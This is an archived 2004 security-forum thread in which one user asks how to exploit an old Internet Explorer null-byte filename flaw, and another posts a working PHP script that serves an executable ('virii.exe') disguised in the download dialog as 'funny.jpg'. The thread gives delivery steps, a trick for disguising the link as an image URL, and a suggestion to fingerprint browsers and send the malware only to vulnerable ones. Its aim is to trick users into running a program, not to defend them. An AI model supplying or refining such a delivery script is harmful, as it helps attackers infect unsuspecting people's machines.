hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: An Old Exploit
GovernmentSecurity.org > The Archives > Exploit Articles
alibaba
Jan 9 2004, 04:46 PM
Hi

The exploit that I want help for is an old one for which most browsers (Internet Explorer) are patched for.But still I want to go ahead with this.With my very basic html knowledge I have not been able to make it work.The following link has explanation for the exploit and a link to the demo.The demonstration is the proof of concept for the exploit.Can somebody decode it for me or guide me to code such an exploit.

Check for youeself http://www.securiteam.com/windowsntfocus/5DP0D1F61A.html

Thanks.
ara2
Jan 9 2004, 06:17 PM
QUOTE
The trick is simply to use a null byte in the filename. A malicious web server can set a filename like "README.TXT%%00PROG.EXE" via the Content-disposition HTTP header. If this kind of filename is set for an attachment, IE will display just "README.TXT" in the download dialog (unless patched). Apparently "%%00" gets decoded and some of the string handling functions believe the filename strings ends there. When opening the file (if the user chooses to "Open" it) though, the whole string is used and the program gets run.


So what you need to do, is have acess to a webserver that can use some kind of scripting language to send http headers. cgi/perl/php are a few examples.

ill explain it with php, as i think its the most popular, and people dont beware of .php webpages. im also assuming the server is apache on windows.

1- user clicks on http://your.ip/index.php
2- your webserver executes the index.php script

CODE

<?

// 'user preferences';)
$directory = 'c:/'; //folder with file to run
$virus = 'virii.exe'; //file to run
$fakeName = 'funny.jpg'; //what the user will see
$mime = 'image/jepg'; //file type description

//make sure file exists
if ( !file_exists($directory.$virus) ) die 'no such file';

//prepare some info for the http header
$filename = $fakeName . '%%00'  . $virus;
$fileSize = filesize($directory.$virus);

//change the http header, to force a download prompt

header( "Content-Type: $mime", 1 );
header( "Content-Disposition: inline; filename=$filename; size=$fileSize;", 1 );

//send the file contents

$fh = fopen($filepath, 'r') or die 'Could not read file';
while ($data = fread($fh, 2048)) {
 print $data;
}
fclose($fh);

?>


3- the browser receives http code that tells it is about to download a file called funny.jpg%%00virii.exe. it displays to the user that the filename is funny.jpg

4- if the user clicks 'open', the file is downloaded and executed.

--

if you even more evil, you can set a directory called funny.jpg, and have apache load index.php by default instead of index.html.

then you can send a link like http://ip/funny.jpg

*note* you dont need an actual and complete web server for that. you could do the same thing in c. code a listening socket that waits for http get request, and replies with the http data generated by the index.php script i just poster. you can read rfcs, or use a packet sniffer or netcat to find out how the http requests and answers are built.


did i miss anything?
alibaba
Jan 9 2004, 08:34 PM
Thank you so much.I am on my way to test it.
sysadmin
Jan 11 2004, 03:04 PM
Hallo ara2,

i´ve tested it on my home network. biggrin.gif

You wrote that´s possible to write the same in c code.
I´m not able to write something else in c. Do you have that code in c for me? Perhaps you could post it for me.

THX a lot.

Bye sysadmin

=k3Rn=
Jan 27 2004, 10:37 PM
QUOTE
if you even more evil, you can set a directory called funny.jpg, and have apache load index.php by default instead of index.html.

then you can send a link like http://ip/funny.jpg


very intresting point !

---

it would be nice if you could write a script that checks the users browser version and vulnarablity and then decides what http data to send - a funny pic or the malicious program. In both cases it would be nice if the user really gets displayed a "funny.jpg" picture - you know what i mean cool.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.